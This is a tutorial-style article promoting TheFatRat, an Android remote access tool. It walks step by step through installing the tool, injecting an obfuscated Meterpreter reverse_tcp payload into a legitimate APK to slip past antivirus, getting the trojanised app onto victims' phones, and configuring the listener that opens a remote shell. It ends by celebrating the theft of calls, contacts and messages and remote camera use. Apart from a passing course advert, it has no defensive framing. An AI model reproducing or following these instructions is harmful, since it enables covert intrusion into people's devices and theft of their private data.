TheFatRat is a simple Android RAT tool to build a backdoor and post exploitation attacks like browser attack. This Android RAT tool produces a malware with mainstream payload and afterward, the perfectly crafted malware will be executed on Windows, Android, Macintosh.
Malware that generated through TheFatRat has the ability to bypass Antivirus. By bypassing AV & Firewalls allows attackers to gain a Meterpreter session.
Also learn Android Hacking and Penetration Testing Course online from one of the best Cybersecurity Elearning platforms.
Automating Metasploit functions in this Android RAT
- Create backdoor for Windows, Linux, Mac, and Android
- This Android RAT Bypass antivirus backdoor
- Checks for Metasploit service and starts if not present
- Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
- Start multiple meterpreter reverse_tcp listeners
- Fast Search in searchsploit
- Bypass AV
- File pumper
- Create backdoor with another technique
- Autorun script for listeners ( easy to use )
Gaining access to Targeted Android Phone – Android RAT (TheFatRat )
You can download this Android RAT tool TheFatRaT from Github
git clone https://github.com/Screetsec/TheFatRat.git
Once this command executed it would clone and stored under TheFatRat.
Then we need to provide execute permission and run setup.sh
chmod +x setup.sh && ./setup.sh
Installation would take 10 to 15 minutes, during the process it checks for missing components if anything missing it will automatically download and install it.
Once installation completed you will be provided with the list of options to create a payload.
In this Kali Linux Tutorial, we go on backdooring with original APK file like, so we need to select option 5 here.
In the mean, we should have download any popular Android application file APK and then need to enter the path of the file.
Once it has done all we need to select the Meterpreter to use, here we have selected reverse_tcp.
And then you need to select the tool to be used in APK creation.
APK build in process, it decompiles the original APK to insert payloads and then recompile the application. It uses obfuscation methods to include payloads also it appends a digital signature.
Once you have the payload created with original APK file you can move to mobile phones through File transfer or any other ways.
Then we need to setup me meterpreter session through msfconsole.
set payload android/meterpreter/reverse_tcp
set lhost (your ip)
set lport (same port provided before)
Once the application installed, you will get the meterpreter session and complete control over the device.
By typing ‘help‘ you can find all the possible commands to execute.
in this Android RAT tool, You can dump calls, contacts, messages and even you can snaps with the mobile remotely.
Credit to TheFatRat Authors team for building such an Awesome and easy to implement this Android RAT tool.